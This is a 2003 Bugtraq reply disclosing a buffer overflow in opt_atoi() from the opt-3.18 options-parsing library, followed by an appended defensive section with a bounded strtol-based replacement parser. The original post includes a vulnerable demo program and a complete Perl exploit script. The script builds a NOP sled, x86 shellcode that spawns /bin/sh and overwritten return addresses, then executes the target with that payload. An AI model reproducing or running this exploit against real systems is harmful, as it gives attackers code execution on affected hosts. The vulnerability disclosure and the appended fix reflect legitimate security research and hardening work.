Re: Options Parsing Tool library buffer overflows.

From: Julien Lanthea (contact_at_jlanthea.net)
Date: 05/23/03

    Date: 23 May 2003 14:41:39 -0000
    To: bugtraq@securityfocus.com
    In-Reply-To: <3EA85B02.7080000@snosoft.com>

    As Secure Network Operations, Inc. (http://www.secnetops.com) reported on
    Bugtraq (Apr 24 2003), the function opt_atoi() from the subroutine library
    opt-3.18 and prior is vulnerable to buffer overflow attacks.

    Here is a sample showing how to exploit the following vulnerable program
    vuln.c using opt_atoi().

    vuln.c :
    --------

    /* To compile vuln.c : */
    /* cc -o vuln vuln.c /path/to/opt-3.18/src/libopt.a */

    #include <stdio.h>
    #include "opt.h"   /* libopt's own header, declares opt_atoi() (assumed name) */

    int main(int argc, char **argv)
    {
        if (argc < 2)
            return 1;
        /* use OPT opt_atoi() on the untrusted argument argv[1] */
        int y = opt_atoi(argv[1]);
        printf("opt_atoi(): %i\n", y);
        return 0;
    }

    expl-optatoi.pl :
    -----------------

    #!/usr/bin/perl
    #
    # expl-optatoi.pl : opt_atoi() function exploit (from Options Parsing
    # Tool shared library opt-3.18 and prior) for this vulnerable code.
    #
    # vuln.c :
    # main(int *argc, char **argv)
    # {
    # /* use OPT opt_atoi() */
    # int y = opt_atoi(argv[1]);
    # printf("opt_atoi(): %i\n", y);
    # }
    #
    # cc -o vuln vuln.c /path/to/opt-3.18/src/libopt.a
    #
    # Author :
    # jlanthea [contact@jlanthea.net]
    #
    # Syntax :
    # perl expl-optatoi.pl <offset> # works for me with offset = -1090

    $shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
                 "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
                 "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
                 "\xff\xff/bin/sh";

    $len = 1032; # The length needed to own EIP.
    $ret = 0xbffff6c0; # The stack pointer at crash time
    $nop = "\x90"; # x86 NOP
    $offset = 0; # Default offset to try.

    if (@ARGV == 1) {
        $offset = $ARGV[0];
    }

    for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
        $buffer .= $nop;
    }

    $buffer .= $shellcode;

    print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n");

    $new_ret = pack('l', ($ret + $offset));

    for ($i += length($shellcode); $i < $len; $i += 4) {
        $buffer .= $new_ret;
    }

    exec("/path/to/vuln $buffer");
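The fix on the calling side is not to hand an unbounded string to a helper that copies it into a fixed buffer. The following is an added example, not code from libopt or from the post above: a bounded replacement for an atoi-style helper that parses in place with strtol, caps the accepted length, and reports rejection instead of trusting its input. It assumes the underlying defect in opt_atoi() is an unchecked copy into a fixed-size stack buffer (the 1032-byte length in the exploit is consistent with that, but libopt's source is not on this page). The names safe_atoi, parse_or, rejects and rejects_digit_string, and the MAX_NUM_LEN limit, are hypothetical choices for this example.

```c
/* Added example, not libopt code. Assumed failure mode: an atoi-style
 * helper that copies its argument into a fixed-size local buffer can be
 * overrun by a long argument. safe_atoi() never copies the input, bounds
 * how much of it is scanned, and returns a status instead of a value. */
#include <ctype.h>
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_NUM_LEN 32   /* a signed 32-bit decimal needs 11 chars; 32 is ample */

/* Parse a decimal int from s into *out.
 * Returns 0 on success, -1 on rejection (NULL, too long, leading space,
 * empty, trailing garbage, or outside int range). Writes only to *out. */
int safe_atoi(const char *s, int *out)
{
    size_t n = 0;
    char *end;
    long v;

    if (s == NULL || out == NULL)
        return -1;
    /* Bounded scan: stop looking as soon as the limit is exceeded, so an
     * oversized argv[1] costs at most MAX_NUM_LEN+1 reads and no copy. */
    while (n <= MAX_NUM_LEN && s[n] != '\0')
        n++;
    if (n > MAX_NUM_LEN)
        return -1;
    if (isspace((unsigned char)s[0]))
        return -1;          /* strtol would skip it; be strict instead */
    errno = 0;
    v = strtol(s, &end, 10);
    if (end == s || *end != '\0')
        return -1;          /* empty string or trailing garbage */
    if (errno == ERANGE || v < INT_MIN || v > INT_MAX)
        return -1;          /* does not fit in int */
    *out = (int)v;
    return 0;
}

/* Parsed value, or fallback when the input is rejected. */
int parse_or(const char *s, int fallback)
{
    int v;
    return safe_atoi(s, &v) == 0 ? v : fallback;
}

/* 1 if s is rejected, 0 if it parses. */
int rejects(const char *s)
{
    int v;
    return safe_atoi(s, &v) != 0;
}

/* Build a constructed input of n '9' characters and report whether the
 * parser rejects it; this is the shape of input the exploit relies on. */
int rejects_digit_string(size_t n)
{
    char *buf = malloc(n + 1);
    int r;
    if (buf == NULL)
        return -1;
    memset(buf, '9', n);
    buf[n] = '\0';
    r = rejects(buf);
    free(buf);
    return r;
}

int main(int argc, char **argv)
{
    int y;
    if (argc < 2) {
        fprintf(stderr, "usage: %s <number>\n", argv[0]);
        return 1;
    }
    if (safe_atoi(argv[1], &y) != 0) {
        fprintf(stderr, "rejected argument of length %zu\n", strlen(argv[1]));
        return 1;
    }
    printf("safe_atoi(): %i\n", y);
    return 0;
}
```

Run it with the same kind of argument the exploit builds (`./safe $(perl -e 'print "9"x1032')`) and the program exits with a rejection message instead of crashing; a normal value such as `-1090` is parsed and printed. The length cap is checked before strtol is ever called, so the cost of a hostile argument is a bounded scan, not a stack write.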

